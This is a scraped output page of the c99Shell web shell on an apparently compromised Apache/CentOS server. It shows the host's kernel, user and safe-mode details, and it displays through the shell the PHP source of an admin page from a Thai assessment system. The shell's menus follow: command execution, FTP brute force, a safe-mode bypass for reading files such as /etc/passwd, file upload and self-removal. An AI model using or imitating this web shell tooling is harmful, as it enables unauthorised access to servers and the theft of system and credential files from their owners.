!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess_OLD/admin/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addHSectionTQ.php (3.17 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
showHeader();

include_once 
"../class/clsSectionTQ.php";
?> 

<script language="javascript">
function checkFormat(){
    if(document.frm.topicSectionTQ.value ==""){
        alert("กรุณากรอกคำอธิบายส่วนของแบบประเมิน !");
        document.frm.topicSectionTQ.focus();
        return false;
    }
}
</script>


<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<form name="frm" method="post" action="processSectionTQ.php">
<br>
<table  width=90%  align=center>
<tr><td>
<fieldset>
        <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="showListAss.php">รายการแบบประเมิน</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="createForm.php?assid=<? echo $assid ?>"> สร้างฟอร์มแบบประเมิน</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"> กำหนดคำอธิบายการตอบของส่วนนี้ (คำถามแบบปลายเปิด)</font></legend>
        <p> <br>
          <br>
<?
        $oC 
= new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

        
$oSTQ= new SectionTQ($oC);
        
$oSTQ->RSSectionTQAll($assid,$indexTQid);
        
$oSTQ->GetRecord();
            
//echo"indexTQid = ".$indexTQid;
            //echo "      oSRQ->SectionTQid = ".$oSRQ->sectionTQid;
?>
       <input type="hidden" name="method" value="edit">
       <input type="hidden" name="indexSeq" value="<?=$indexSeq;?>">
       <input type="hidden" name="assid" value="<?=$assid?>">
       <input type="hidden" name="sectionTQid" value="<?=$oSTQ->sectionTQid?>">
       <input type="hidden" name="sequenceTQ" value="<?=$oSTQ->sequenceTQ?>">
        <table width="64%" border="0" align="center">
          <tr> 
            <td height="22" colspan="2"  align="center" class="colinput1"><strong>กำหนดคำอธิบายการตอบของ 
              : <u>ส่วนที่ <? echo $indexSeq?></u></strong> </td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
          </tr>
          <tr> 
            <td width="47%" class="colinput4">&nbsp;เพิ่มคำอธิบายส่วนของแบบประเมิน <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">*</font></td>
            <td width="53%"><textarea name="topicSectionTQ" cols="40" rows="4"><?=$oSTQ->topicSectionTQ;?></textarea></td>
          </tr>
          <tr> 
            <td height="22" colspan="2">&nbsp;</td>
          </tr>
          <tr> 
            <td colspan="2"><div align="center"> <br>
                <input type="submit" name="add" value="บันทึก" onClick="return checkFormat();">
                <input type="reset" name="clear" value="เคลียร์ข้อมูล">
                <input type="button" name="cancel" value="ยกเลิก" onClick="location.href = 'createForm.php?assid=<? echo $assid ?>'">
              </div></td>
          </tr>
          <tr> 
            <td>&nbsp;</td>
            <td>&nbsp;</td>
          </tr>
        </table>
        </fieldset><br><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>หมายเหตุ : </b>* หมายถึง ต้องกรอกข้อมูลให้สมบูรณ์</font>
        </td>
        </tr>
</table>
</form>

<? showFooter(); ?>




:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0139 ]--